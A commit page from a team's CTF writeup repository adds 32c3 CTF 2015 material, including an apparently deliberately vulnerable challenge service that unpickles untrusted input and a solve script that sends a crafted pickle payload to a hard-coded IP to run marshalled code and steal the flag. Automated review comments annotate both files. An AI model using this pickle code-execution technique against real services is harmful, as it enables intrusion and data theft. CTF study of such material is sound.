
Commit c361949

committed
added 32c3
1 parent d43478a commit c361949


5 files changed

+95
-0
lines changed

5 files changed

+95
-0
lines changed

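--- a/2015-12-27-32c3/README.md
+++ b/2015-12-27-32c3/README.md
@@ -0,0 +1,11 @@
+# Writeup 32c3 CTF 2015
+
+Uczestniczyliśmy (cr019283, c7f.m0d3, mnmd21891, msm, Rev, other019, nazywam i Shalom) w 32c3 CTF 2015, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy).
+
+### Spis treści:
+* [Forth (Pwn) 150](forth_pwn_150)
+* [Teufel (Pwn) 200](teufel_pwn_200)
+* [HD44780 (Embedded) 150](hd44780_embedded_150)
+* [TinyHosting (Web) 250](tiny_hosting_web_250)
+* [Gurke (Misc) 300](gurke_misc_300)
+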
+7
@@ -0,0 +1,7 @@
1+
##Gurke (Misc, 300p)
2+
3+
###PL
4+
[ENG](#eng-version)
5+
6+
7+
### ENG version
+48
@@ -0,0 +1,48 @@
1+
#!/usr/bin/env python
2+
import sys
3+
import os
4+
5+
import socket
6+
import pickle
7+
import base64
8+
import marshal
9+
import types
10+
import inspect
11+
import encodings.string_escape
12+
13+
class Flag(object):
14+
def __init__(self):
15+
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16+
s.connect(("172.17.0.1", 1234))
17+
self.flag = s.recv(1024).strip()
18+
s.close()
19+
flag = Flag()
20+
21+
from seccomp import *
22+
23+
f = SyscallFilter(KILL)
24+
f.add_rule_exactly(ALLOW, "read")
25+
f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stdout.fileno()))
26+
f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stderr.fileno()))
27+
f.add_rule_exactly(ALLOW, "close")
28+
f.add_rule_exactly(ALLOW, "exit_group")
29+
30+
f.add_rule_exactly(ALLOW, "open", Arg(1, EQ, 0))
31+
f.add_rule_exactly(ALLOW, "stat")
32+
f.add_rule_exactly(ALLOW, "lstat")
33+
f.add_rule_exactly(ALLOW, "lseek")
34+
f.add_rule_exactly(ALLOW, "fstat")
35+
f.add_rule_exactly(ALLOW, "getcwd")
36+
f.add_rule_exactly(ALLOW, "readlink")
37+
f.add_rule_exactly(ALLOW, "mmap", Arg(3, MASKED_EQ, 2, 2))
38+
f.add_rule_exactly(ALLOW, "munmap")
39+
f.load()
40+
41+
data = os.read(0, 4096)
42+
try:
43+
res = pickle.loads(data)
44+
print 'res: %r\n' % res
45+
except Exception as e:
46+
print >>sys.stderr, "exception", repr(e)
47+
48+
os._exit(0)
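Review bot: Nothing in this file says what it is, and the Gurke README added in the same commit is still an empty stub, so a reader meets `res = pickle.loads(data)` on raw stdin bytes with no hint that this is (presumably) the organisers' deliberately vulnerable service rather than code to reuse. A header comment such as `# Challenge source, kept for reference: unpickles untrusted input on purpose; Python 2 only.` would settle that. A why-comment above `f = SyscallFilter(KILL)` should also state that the filter restricts syscalls only, while the module-level `flag` object created before `f.load()` stays reachable inside the interpreter. The file header that would give this file's path is not shown on the page.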
+28
@@ -0,0 +1,28 @@
1+
import base64
2+
import marshal
3+
import requests
4+
5+
6+
def fun1(frames):
7+
return frames[3][0]
8+
9+
10+
def fun2(frames_data):
11+
return frames_data[-6][1]['flag'].flag
12+
13+
code1 = base64.b64encode(marshal.dumps(fun1.func_code))
14+
code2 = base64.b64encode(marshal.dumps(fun2.func_code))
15+
16+
17+
class Flag(object):
18+
def __init__(self):
19+
self.flag = 'test'
20+
21+
flag = Flag()
22+
data = "cos\nwrite\n(I1\nctypes\nFunctionType\n(cmarshal\nloads\n(cbase64\nb64decode\n(S'"+code2+"'\ntRtR(dS''\n))tR(cinspect\ngetmembers\n(ctypes\nFunctionType\n(cmarshal\nloads\n(cbase64\nb64decode\n(S'"+code1+"'\ntRtR(dS''\n(t(ttR(cinspect\ngetouterframes\n(cinspect\ncurrentframe\n)RtRtRtRtRtR."
23+
url = "http://136.243.194.43/"
24+
result = requests.post(url, data=data)
25+
print(result.text)
26+
# res = pickle.loads(data)
27+
# print('res: %r\n' % res)
28+
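Review bot: `result = requests.post(url, data=data)` runs at module level against a hard-coded address, so importing or re-running this file for study sends the request to whatever now answers at that IP; moving the lines from `url = ...` onward under `if __name__ == "__main__":` and passing `timeout=10` would avoid that. The indices in `fun1` (`frames[3][0]`) and `fun2` (`frames_data[-6][1]['flag']`) and the hand-written pickle string carry no comment, and the accompanying writeup section is an empty stub, so I would add a short comment above each saying which object the index is expected to select. The local `Flag` class and `flag` instance appear to exist only for the commented-out `pickle.loads` self-test at the end; either say so in a comment or drop both.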

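--- a/README.md
+++ b/README.md
@@ -1,5 +1,6 @@
 # CTF writeups from P4 Team
 
+* [2015.12.27 **32c3 CTF 2015** (46th place / 389 teams)](2015-12-27-32c3)
 * [2015.12.05 **SECCON CTF 2015** (12th place / 872 teams)](2015-12-05-seccon)
 * [2015.11.28 **9447 Security Society CTF 2015** (21st place / 595 teams)](2015-11-28-9447)
 * [2015.11.20 **Defcamp CTF Finals 2015** (11th place / 15 teams out of 378 teams)](2015-11-20-dctffinals)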
